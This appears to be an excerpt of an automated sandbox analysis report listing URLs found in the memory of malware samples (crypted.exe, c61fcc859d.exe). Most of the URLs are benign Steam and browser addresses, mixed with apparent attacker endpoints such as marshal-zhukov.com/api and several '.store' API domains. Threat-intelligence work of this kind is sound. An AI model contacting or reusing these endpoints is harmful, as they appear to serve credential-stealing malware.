                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528818634.00000000031FB000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.ctem
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.000000000106D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fadehairucw.store:443/api
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://founpiuer.store:443/apipio
                    Source: powershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.0000026080C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: c61fcc859d.exe, 00000017.00000003.2644957453.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/
                    Source: c61fcc859d.exe, 00000017.00000003.2674681113.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2613954644.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/0
                    Source: c61fcc859d.exe, 00000017.00000003.2613954644.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/X
                    Source: c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2645054377.0000000005761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api
                    Source: c61fcc859d.exe, 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614436981.00000000010EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api:
                    Source: c61fcc859d.exe, 00000017.00000003.2628472202.0000000005761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apiW
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2674681113.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570547961.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2628543129.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2613954644.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2644957453.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/l
                    Source: c61fcc859d.exe, 00000017.00000003.2651983141.00000000010EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com:443/api
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: https://mozilla.org0/
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://navygenerayk.store:443/api
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD7A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EBF2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.00000260901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260819E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD57A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD57A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: c61fcc859d.exe, 0000001E.00000003.2745036681.0000000001354000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scriptyprefej.store:443/api
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748028285.000000000134A000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
